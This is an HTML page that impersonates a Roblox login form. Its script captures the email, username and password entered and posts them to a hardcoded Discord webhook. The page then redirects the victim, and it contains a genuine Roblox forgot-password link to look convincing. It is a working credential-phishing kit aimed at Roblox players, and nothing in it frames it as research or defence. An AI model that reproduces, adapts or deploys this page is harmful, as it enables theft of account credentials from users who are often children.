<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Register</title>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
    <link rel="shortcut icon" href="fav.ico" type="image/x-icon">
    <style>
        body {
            font-family: "Roboto", sans-serif;
            background-image:url(back.jpg);
            background-position-x: center;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        #container {
            width: 350px;
            background-color: #242424;
            padding: 30px;
            border: 1px solid black;
            border-radius: 8px;
            box-shadow: 0px 0px 10px rgb(35, 37, 39);
        }

        h1 {
            font-family: "Roboto", sans-serif;
            font-size: 24px;
            font-weight: bold;
            color: #ffffff;
            margin-bottom: 20px;
            text-align: center;
        }

        form {
            display: flex;
            flex-direction: column;
        }

        label {
            font-family: "Roboto", sans-serif;
            font-size: 16px;
            color: #ffffff;
            margin-bottom: 5px;
        }

        input {
            padding: 10px;
            margin-bottom: 10px;
            border-radius: 5px;
            border: 1px solid #ccc;
            background-color: #000000;
            font-family: "Roboto", sans-serif;
            color: white;
            font-size: 16px;
        }
        
        button {
            font-family: "Roboto", sans-serif;
            background-color: rgb(35, 37, 39);
            color: #fff;
            padding: 12px;
            border: 2px solid white;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        button:hover {
            background-color: #000000;
        }
         #a {
            color: white;
            width: 120px;
            right: 80%;
            text-decoration: none;
         }
    </style>
</head>
<body>
    <div id="container">
        <h1>Login to Roblox</h1>
        <form id="registrationForm">
            <label for="email">Email:</label>
            <input type="email" placeholder="Email" id="email" name="email" required>

            <label for="username">Username:</label>
            <input type="text" id="username" placeholder="Username" name="username" required>

            <label for="password">Password:</label>
            <input type="password" id="password" placeholder="Password" name="password" required>
<br>
            <button type="submit">Login</button>
            <br>
           <a id="a" href="https://www.roblox.com/login/forgot-password-or-username" target="_blank"> <p>Forgot password</p></a>
        </form>
    </div>

    <script>
        document.getElementById('registrationForm').addEventListener('submit', function(event) {
            event.preventDefault();
            const email = document.getElementById('email').value;
            const username = document.getElementById('username').value;
            const password = document.getElementById('password').value;
            sendRegistrationDataToDiscord(email, username, password);
        });

        async function sendRegistrationDataToDiscord(email, username, password) {
            const response = await fetch('https://discord.com/api/webhooks/1236632595731578912/uDYS5z3NZZxxwAbuDWA6Q4hA_R1yM0KHNRiXm_rMdm6RdO3qjV2GMaCdv-e0amPjwr0G', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    embeds: [{
                        title: "New Registration",
                        fields: [
                            {
                                name: "Email",
                                value: email
                            },
                            {
                                name: "Username",
                                value: username
                            },
                            {
                                name: "Password",
                                value: password
                            }
                        ],
                        color: 16777215 // Hex code for white (you can change this to any color you prefer)
                    }]
                })
            });

            if (response.ok) {
                window.location.href = 'load';
            } else {
            }
        }
    </script>
</body>
</html>
